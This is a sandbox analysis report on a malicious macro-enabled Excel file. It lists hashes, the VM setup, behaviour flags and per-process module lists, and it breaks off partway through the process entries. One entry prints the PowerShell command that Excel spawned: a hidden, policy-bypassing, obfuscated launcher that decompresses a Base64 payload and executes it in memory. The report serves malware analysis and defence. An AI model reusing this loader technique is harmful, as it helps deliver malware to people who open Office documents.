General Info

File name

Documento_059025_FT_20190415_0005008_.xls

Full analysis
https://app.any.run/tasks/7776f0fc-fe25-4811-86c3-b1a1e8887ba2
Verdict
Malicious activity
Analysis date
4/15/2019, 08:52:59
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: utetnte, Last Saved By: IEUser, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Apr 11 12:50:29 2019, Last Saved Time/Date: Fri Apr 12 09:11:38 2019, Security: 0
MD5

bdca0278481f87df29f57f9a59bee23c

SHA1

64c21e56d8f35b9b0f9f1533f0b8850faf31dd75

SHA256

9dc2a7a5a2f6a93ccedd912ce3a529d7c42155396a5610536ecf107df15ddab1

SSDEEP

1536:mn1DN3aMePUKccCEW8yjJTdrBZq8/Ek3hOdsylKlgryzc4bNhZFGzE+cL2knAxl+:mn1DN3aM+UKccCEW8yjJTdrBZq8/Ek3z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Executes PowerShell scripts
  • EXCEL.EXE (PID: 2076)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2076)
Executes PowerShell scripts
  • powershell.exe (PID: 3368)
Creates files in the user directory
  • powershell.exe (PID: 3640)
  • powershell.exe (PID: 3368)
Application launched itself
  • powershell.exe (PID: 3368)
  • rundll32.exe (PID: 2720)
Uses RUNDLL32.EXE to load library
  • rundll32.exe (PID: 2720)
Creates files in the user directory
  • EXCEL.EXE (PID: 2076)
  • EXCEL.EXE (PID: 3564)
  • EXCEL.EXE (PID: 1160)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2076)
  • EXCEL.EXE (PID: 3564)
  • EXCEL.EXE (PID: 1160)


Static information

TRiD
.xls | Microsoft Excel sheet (48%)
.xls | Microsoft Excel sheet (alternate) (39.2%)
EXIF
FlashPix
Author:
utetnte
LastModifiedBy:
IEUser
Software:
Microsoft Excel
CreateDate:
2019:04:11 11:50:29
ModifyDate:
2019:04:12 08:11:38
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
Microsoft
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
aprile 2019
HeadingPairs
null
null
CompObjUserTypeLen:
31
CompObjUserType:
Microsoft Excel 2003 Worksheet

Processes

Total processes
44
Monitored processes
9
Malicious processes
1
Suspicious processes
2

Behavior graph

(graph image not captured; processes shown in the graph, in order: start, excel.exe, excel.exe, rundll32.exe, rundll32.exe, rundll32.exe, mctadmin.exe, excel.exe, powershell.exe, then powershell.exe, the only node flagged with specs)

Process information

PID
1160
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
3564
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
2720
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\propsys.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\kbdit.dll

PID
636
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdit.dll

PID
1136
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\winsta.dll
c:\windows\system32\kbdit.dll

PID
3776
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2076
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\winmm.dll

PID
3368
CMD
powershell -w 1 -nOPROF -NONinTe -exEcUtI BYPass -C "set-variable -name "LB" -value "I"; set-variable -name "I" -value "E"; set-variable -name "V" -value "X"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString()('('' & ((gv ''''*MDr*'''').naMe[3,11,2]-Join'''''''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''''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'''' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )'')')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\netutils.dll

PID
3640
CMD
